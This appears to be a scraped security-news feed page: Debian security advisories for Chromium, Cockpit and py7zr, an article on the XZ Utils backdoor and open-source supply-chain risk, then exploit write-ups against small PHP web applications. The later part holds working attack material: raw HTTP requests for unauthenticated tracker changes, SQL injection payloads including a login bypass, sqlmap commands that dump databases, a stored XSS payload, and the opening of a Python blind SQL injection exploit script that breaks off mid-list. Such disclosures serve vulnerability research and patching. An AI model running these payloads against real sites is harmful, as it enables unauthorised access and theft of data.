Debian Linux Security Advisory 5656-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5656-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonApril 11, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-3157 CVE-2024-3515 CVE-2024-3516Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 123.0.6312.122-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmYYJcAACgkQZF0CR8NudjdhkRAAw6sMjh+3xY72+Q5DbvExle0J+9jEL9OALHhrVvWzGpUQjOx4sw64m03ZOV6G9W7/j5EqzMeSKrVFdRi+e/mANlBrXs4QfH1O+5cMD9fYUO/d6nPbFQJXwYOeU4GINkJOv690CQcIVAei1Udp6dmwL8pe4BAVTnDqWWgyxhBubBPM+RLVBu6/gKFa6Fm8fyOjcuwrwsdCVFNd2T9hICnQNLbh3DOFJ+6ElFCYDvcNbfdfYOXh/NIs3x8eImguEPsm8u4VmDAyg6JUZunUSiXFeVFqwmbiBDaloXjLsTRu2uBjeQcdMrU/FoZoKataksl5MZJmfsRspCIina4WOWkeL1tcg3texfCFVQ/XWreJKvFoyGOdBXcAVEcY+ePDmkahmQu3QyOB/QD4bxq76T2bwWylpB95S8f31Dr1SiJ3ru7NjKQsezxls3Ey1IWBia/qG4rYtmjwi/zcyTeejROSTXLBeCvOKFe7jPCw6iQ5fZb9eWtiBbJ2mIJBhSyrSzCKbfQjSRpV2JHPp5A7IksBcq8gtoL3L3ubhnaFsTvvtPeTQQK3pJvN+sZgnx/QMVSl2Kh/6HF28JqOPqGZWtSE+fcoQM0zubO41/LGOowNzvFK3rIa+iolu+iSykup40Xmr3sh+q8HSDKweX3znVFj+JFd9pk6DiTBwcKDjipTKlA==Cqgo-----END PGP SIGNATURE-----

Debian Security Advisory 5656-1

Much of the open source code embedded in enterprise software stacks comes from small, under-resourced, volunteer-run projects.

Source: Juliana\_haris via Shutterstock

The recent discovery of a backdoor in the XZ Utils data compression utility — present in nearly all major Linux distributions — is a stark reminder that organizations who consume open source components ultimately own responsibility for securing the software.

XZ Utils, like thousands of other open source projects, is volunteer-run and, in its case, has a single maintainer managing it. Such projects often have little to no resources for handling security issues, meaning organizations use the software at their own risk. That means security and development teams must implement measures for managing open source risk the same way they do with internally developed code, security experts say.

"While it's unlikely an organization can effectively prevent \[all\] exposure to supply chain risks, organizations can absolutely focus on a strategy to reduce the probability that a supply chain attack is successful," says Jamie Scott, founding product manager at Endor Labs.

Open source is not the same as outsourcing: "Open source maintainers of software are volunteers. At an industry level, we need to treat them as such. We own our software; we are responsible for the software we re-use."

**Well-Intentioned, Under-Resourced**

Concerns over open source software security are by no means new. But it often takes discoveries like the Log4Shell vulnerability and the backdoor in XZ Utils to really drive home just how vulnerable organizations are to components in their code. And often, the code comes from well-intentioned yet hopelessly under-resourced open source projects that are minimally maintained.

XZ Utils, for instance, is essentially a one-person project. Another individual managed to sneak the backdoor into the utility over a nearly three-year period, by gradually gaining enough trust from the project maintainer. If a Microsoft developer had not chanced upon it in late March when investigating odd behavior associated with a Debian installation, the backdoor might well have ended up on millions of devices globally — including those belonging to large corporations and government agencies. As it turned out, the backdoor had minimal impact because it affected versions of XZ Utils that were only present in unstable and beta versions of Debian, Fedora, Kali, open SUSE, and Arch Linux.

The next such open source code compromise could be far worse. "The scariest part for enterprise organizations is that their applications are built on top of open source software projects just like XZ Utils," says Donald Fischer, co-founder and CEO of Tidelift. "XZ Utils is one package of tens of thousands that are in use every day by typical enterprise organizations," he says.

Most of these organizations lack sufficient visibility into the security and resilience of this part of their software supply chain to be able to evaluate risk, he notes.

A recent Harvard Business School study estimated the demand-side value of open source software to be an astonishing $8.8 trillion. Maintainers are at the core of this ecosystem and many of them are flying solo, Fischer says. A survey conducted by Tidelift last year found 44% of open source project maintainers describe themselves as the sole maintainers of their projects. Sixty percent identified themselves as unpaid hobbyists, and the same percentage said they have either quit or have considered quitting their roles as project maintainers. Many maintainers described their efforts as stressful, lonely, and financially unrewarding work, Fischer says.

"The XZ utils hack brings into stark relief the risks of under-investing in the health and resilience of the open source software supply chain \[that\] enterprise organizations rely on," Fischer says. "Enterprise organizations need to realize that the majority of the most relied-upon open source packages are maintained by volunteers who describe themselves as unpaid hobbyists. These maintainers are not enterprise suppliers but are expected to work and deliver like them."

**Danger: Transitive Dependencies**

A study that Endor conducted in 2022 found that 95% of open source vulnerabilities are present in so-called transitive dependencies, or secondary open source packages or libraries that a primary open-source package might depend upon. Often, these are packages that developers don't directly select themselves but are automatically employed by an open source package in their development project.

"For example, when you trust one Maven package, on average there are an additional 14 dependencies you implicitly trust as a result," Scott says. "This number is even larger in certain software ecosystems such as NPM where you on average import 77 other software components for every one you trust."

One way to start start mitigating open source risks is to pay attention to these dependencies and be selective about what projects you choose, he says.

Organizations should vet dependencies, especially the smaller, one-off-packages, manned by one- and two-person teams, adds Dimitri Stiliadis, Endor's CTO and co-founder. They should determine if dependencies in their environment have proper security controls or if a single individual commits all code; whether they have binary files in their repositories that no one knows about; or even if someone is actively maintaining the project at all, Stiliadis says.

"Focus your efforts on improving your response effectiveness — foundational controls such as maintaining a mature software inventory remains one of the highest value programs you can have in place to quickly identify, scope, and respond to software risks once they're identified," Scott advises.

Software-composition analysis tools, vulnerability scanners, EDR/XDR systems, and SBOMs can also all help organizations quickly identify vulnerable and compromised open source components.

**Acknowledging the Threat**

"Mitigating exposure starts with shared understanding and acknowledgement in the C-suite and even at the board level that roughly 70% of the ingredients of the average software product are open source software historically created by mostly uncompensated contributors," Tidelift's Fischer says.  

New regulations and guidelines in the financial services industry, the FDA, and NIST will shape how software is developed in the years ahead and organizations need to prepare for them now. "Winners here will quickly adapt from a reactive strategy to a proactive strategy to managing open source-related risk," he says.

Fischer recommends that organizations get their security and engineering teams to identify how new open source components come into their environment. They should also define roles for monitoring these components and proactively remove ones that don't fit the company's risk appetite. "Reacting to late stage problems has become an ineffective way to deal with the scale of the risk to the business over the last several years, and the US Government is signaling that era is coming to an end," he says.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

XZ Utils Scare Exposes Hard Truths About Software Security

Debian Linux Security Advisory 5655-1 - It was discovered that Cockpit, a web console for Linux servers, was susceptible to arbitrary command execution if an administrative user was tricked into opening an sosreport file with a malformed filename.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5655-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 04, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cockpitCVE ID         : CVE-2024-2947It was discovered that Cockpit, a web console for Linux servers, wassusceptible to arbitrary command execution if an administrative userwas tricked into opening an sosreport file with a malformed filename.For the stable distribution (bookworm), this problem has been fixed inversion 287.1-0+deb12u1.We recommend that you upgrade your cockpit packages.For the detailed security status of cockpit please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cockpitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYO+CkACgkQEMKTtsN8Tjah6w/+KMkDnUZXuYjUaF6XZLi05PEH8S60u4MYNu0kDIgNAaxfOvwJC9FiIOXfBWDA8q3GofBgAozeHpBIr/c654yn8mCu8/w6eX/j4eDK+5Obj+BGUBvBNxOt2hZK7rPmv7Dklz0mF0yFqGG9f+/MOT3HZU4tN4CZK37kbFUBvIbgf1X3vWVbJrdWBn/6yI6O7bogx4B0eG233Yc7jnSNTU6V2PfD9Eo8PpxwUnLB6ybgfhcgjmxbyTRp8UwKgfvon2XDI1BpcO7EJUf1XssNm7E7LdH8ZgWclOL7mHLym4nL9vOAPHY5ST1wfGlweTuvIYda/lOUc2Tu5K/r5YaWczVfNG4hhIAOAtJfHOAbog1+pJ73Ic4MPDCPkMyV994xEwyyFo5a1xJl5+BGnXjAuEQDJ8Jf7W9axI9TNqmsQusEt77jr17o0gDiX9JGidXh60sPLMoXO/SvzzI7Yw6SGOMBdu+q1QzoXezPa8ZU14ihXswbM/m01J8pg9abxA8RHVsyHMfF8L6YYbTLIqpMzhpDsxEeHF7MDvbMAMwKPLOM3nxZe4eC9/7glrHS5VHlWzpJ+V8H/ndCvCkkAKDTEEAxQEmrVDXJxP5hzRM4BtX4TlzAFWZDF/aw8CLw71x/Ene8Kp7SaNfNZfBhv9D2LZ95Eec38bFQoNT6+fphei3xv6M==cD4W-----END PGP SIGNATURE-----

Debian Security Advisory 5655-1

Debian Linux Security Advisory 5654-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5654-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonApril 03, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-3156 CVE-2024-3158 CVE-2024-3159Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 123.0.6312.105-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmYNqs8ACgkQZF0CR8Nudjdfiw//QzG56tH03cLF/I/vvBF5qJv8pnyNak49LSZOJJi3yKnQbFPvXhSeirXHnM4tV7DapfpLKx/K4ih0nsixa1rLMYY+i9zxytEZGGihNcqSVJaVE5GyBinGWchlkZQMUpf9xAW+BfvZqJUMxalvX/mr1MnqneGr0xnO9/PVyMq0SnJAA9b9ODOsccwAV2vuK0/M3oDo7RJvrfK8fWCOMmTk7Pk8MUhU2ypereet7e5swJm7rLOmik+Y6jOFwh5Z8/xHPu/kfPKIS6h2mWOYddDwG7DEmu8ZpwEPAFaAF+c/fxUIW6rA1y+rWutLLnPImdPOiC4dt8xnE3ln8MomxRNOYrc7FHtH3SohhLWa5HbggdrS3BNyv3Eoxk1SNeMWqcSh94wBg4IZ9lQCAbGLGA7qukhBP2dZtxKPmssZP0VhGPGDbD7Ir4APJ7TfHWWd/G/I24IE7AVHY9Qd14Utd9Ikiapj1AGUnzxFfwW4BNhO9jQijGerqV+oOes+TutVeHsrDuV80OGF5xTEMD/kvxtB+7WIm9Engy6EBdghlGdH3jHQ4KS9FCRzvd77EfDykYqqWaqbK+ZpvvJxs7oraW0ACpUgCDZhLZZei6VlV+g3GeA0Mx1yhxse6uUOVVKvS/bSQna7wJZscF8KgEolrjz8V7/HL5L0xAUgJn4G+2po27o==X+nc-----END PGP SIGNATURE-----

Debian Security Advisory 5654-1

Debian Linux Security Advisory 5652-1 - A directory traversal vulnerability was discovered in py7zr, a library and command-line utility to process 7zip archives.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5652-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 02, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : py7zrCVE ID         : CVE-2022-44900A directory traversal vulnerability was discovered in py7zr, a libraryand command-line utility to process 7zip archives.For the oldstable distribution (bullseye), this problem has been fixedin version 0.11.3+dfsg-1+deb11u1.We recommend that you upgrade your py7zr packages.For the detailed security status of py7zr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/py7zrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYMRY4ACgkQEMKTtsN8Tja00w/+Kfo8CeMftEP0Lx8z1kkRcnnZstkzOg75jCxH9VYJ23gJ3zR3kd54F5+6vTvJ/Hk8hSZq2HovxYnAeyBv/VM/vZKWiyOc7XRvXliTVZockofgMbfxRS4UplYPpJ9m74xRV6zOBKHfZKYsQQOKb4rMdFmSgGB3yd+oPrqaA8sNBAlsAQmV/UWkOR5mNDNiSw5E/s4wUhmVkh8/8XKDqqi6E+icog/BiVf8oEE7tWlpjdko2dD80EeLpNSSK+esheWnhdURxtGoM+zZYyfA42/cQ1dKXYzz2rh1fHl+ZmsT0kOu+19uG25SUEuuXLooXqXt/N2QCSsu3ICWAdX9ExBtaAMRg8lhEgKqjp1KzNON/RX3mn7pLx1Bdxk5u+dU98wqzu4g9YvD4ObypScrtXaXY7XX7OUYquIcsMWRmzXya3Em4DGyNZk7R6IeVFi5r4p76+qhmW+ao6IIW5OqhGVIkEZFMQRo5Cz9p5d67UaEupVWq0UkdQ9X7y00hQ6Xo3HikP1otdsEqB0ZcwEtju1t4air+IDWopKpZsWqiP+Mc9BiRX2RAo8PxrpyIIYDtMDgW2e0dht+AfqmGaQukoHZXTYkaoRLAj2/PlEIr7M8bgstFNvyJ2QqDoPkfFQf+pfo5/yQawk5hFvj9FUMvTl8JZk3ajWIuZgP/9J9lXozNyo==R89L-----END PGP SIGNATURE-----

Debian Security Advisory 5652-1

Daily Habit Tracker version 1.0 suffers from an access control vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24496### Broken Access Control:> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.### Affected Components:> home.php, add-tracker.php, delete-tracker.php, update-tracker.php### Description:> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.## Proof of Concept:### Unauthenticated Access to Home page> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.### Create Tracker as Unauthenticated UserTo create a tracker, use the following request:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 108Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```### Update Tracker as Unauthenticated UserTo update a tracker, use the following request:```POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 121Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes```### Delete Tracker as Unauthenticated User:To delete a tracker, use the following request:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.

Daily Habit Tracker 1.0 Broken Access Control

Daily Habit Tracker version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24495### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> delete-tracker.php### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)### SQLMapSave the following request to `delete_tracker.txt`:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 SQL Injection

Daily Habit Tracker version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24494### Stored Cross-Site Scripting (XSS):> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.### Affected Components:> add-tracker.php, update-tracker.phpVulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat### Description:> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.## Proof of Concept:The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 175Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 Cross Site Scripting

Employee Management System version 1.0 suffers from additional remote SQL injection vulnerabilities. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    # Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24499### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/edit_profile.php> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### SQLMapSave the following request to `edit_profile.txt`:```POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 88Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/edit_profile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.------------------------# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24497### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/login.php> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `' and 1=1-- -` can be used to bypass authentication within admin login page.```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 61Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpCookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=```### SQLMapSave the following request to `admin_login.txt`:```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin&txtpassword=password&btnlogin=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Employee Management System 1.0 SQL Injection

Online Hotel Booking in PHP version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title:  Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)# Google Dork: n/a# Date: 04/02/2024# Exploit Author: Gian Paris C. Agsam# Vendor Homepage: https://github.com/projectworldsofficial# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip# Version: 1.0# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12# CVE : n/aimport requestsimport argparsefrom colorama import (Fore as F, Back as B, Style as S)BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITErequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')parser.add_argument('-u', '--url', help='')args = parser.parse_args()def banner():    print(f"""{FR}      ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄  ▄▄▄        ▪  ·▄▄▄▄  ▪     ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪     ██ ██▪ ██  ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄  ▄█▀▄ ▐█·▐█· ▐█▌▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██  ▀█▄▀▪▀▀▀ ▀▀▀  ▀▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•         Github: https://github.com/offensive-droid         {FW}    """)# Define the characters to testchars = [    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 